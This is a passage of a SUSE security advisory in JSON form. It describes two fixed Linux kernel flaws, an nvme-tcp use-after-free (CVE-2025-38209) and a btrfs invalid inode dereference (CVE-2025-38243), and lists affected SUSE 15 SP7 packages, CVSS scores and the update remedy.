"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnvme-tcp: remove tag set when second admin queue config fails\n\nCommit 104d0e2f6222 (\"nvme-fabrics: reset admin connection for secure\nconcatenation\") modified nvme_tcp_setup_ctrl() to call\nnvme_tcp_configure_admin_queue() twice. The first call prepares for\nDH-CHAP negotitation, and the second call is required for secure\nconcatenation. However, this change triggered BUG KASAN slab-use-after-\nfree in blk_mq_queue_tag_busy_iter(). This BUG can be recreated by\nrepeating the blktests test case nvme/063 a few times [1].\n\nWhen the BUG happens, nvme_tcp_create_ctrl() fails in the call chain\nbelow:\n\nnvme_tcp_create_ctrl()\n nvme_tcp_alloc_ctrl() new=true ... Alloc nvme_tcp_ctrl and admin_tag_set\n nvme_tcp_setup_ctrl() new=true\n nvme_tcp_configure_admin_queue() new=true ... Succeed\n nvme_alloc_admin_tag_set() ... Alloc the tag set for admin_tag_set\n nvme_stop_keep_alive()\n nvme_tcp_teardown_admin_queue() remove=false\n nvme_tcp_configure_admin_queue() new=false\n nvme_tcp_alloc_admin_queue() ... Fail, but do not call nvme_remove_admin_tag_set()\n nvme_uninit_ctrl()\n nvme_put_ctrl() ... Free up the nvme_tcp_ctrl and admin_tag_set\n\nThe first call of nvme_tcp_configure_admin_queue() succeeds with\nnew=true argument. The second call fails with new=false argument. This\nsecond call does not call nvme_remove_admin_tag_set() on failure, due to\nthe new=false argument. Then the admin tag set is not removed. However,\nnvme_tcp_create_ctrl() assumes that nvme_tcp_setup_ctrl() would call\nnvme_remove_admin_tag_set(). Then it frees up struct nvme_tcp_ctrl which\nhas admin_tag_set field. Later on, the timeout handler accesses the\nadmin_tag_set field and causes the BUG KASAN slab-use-after-free.\n\nTo not leave the admin tag set, call nvme_remove_admin_tag_set() when\nthe second nvme_tcp_configure_admin_queue() call fails. Do not return\nfrom nvme_tcp_setup_ctrl() on failure. Instead, jump to \"destroy_admin\"\ngo-to label to call nvme_tcp_teardown_admin_queue() which calls\nnvme_remove_admin_tag_set().",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-38209",
"url": "https://www.suse.com/security/cve/CVE-2025-38209"
},
{
"category": "external",
"summary": "SUSE Bug 1246022 for CVE-2025-38209",
"url": "https://bugzilla.suse.com/1246022"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.6,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-11T14:05:07Z",
"details": "moderate"
}
],
"title": "CVE-2025-38209"
},
{
"cve": "CVE-2025-38243",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-38243"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nbtrfs: fix invalid inode pointer dereferences during log replay\n\nIn a few places where we call read_one_inode(), if we get a NULL pointer\nwe end up jumping into an error path, or fallthrough in case of\n__add_inode_ref(), where we then do something like this:\n\n iput(\u0026inode-\u003evfs_inode);\n\nwhich results in an invalid inode pointer that triggers an invalid memory\naccess, resulting in a crash.\n\nFix this by making sure we don\u0027t do such dereferences.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-38243",
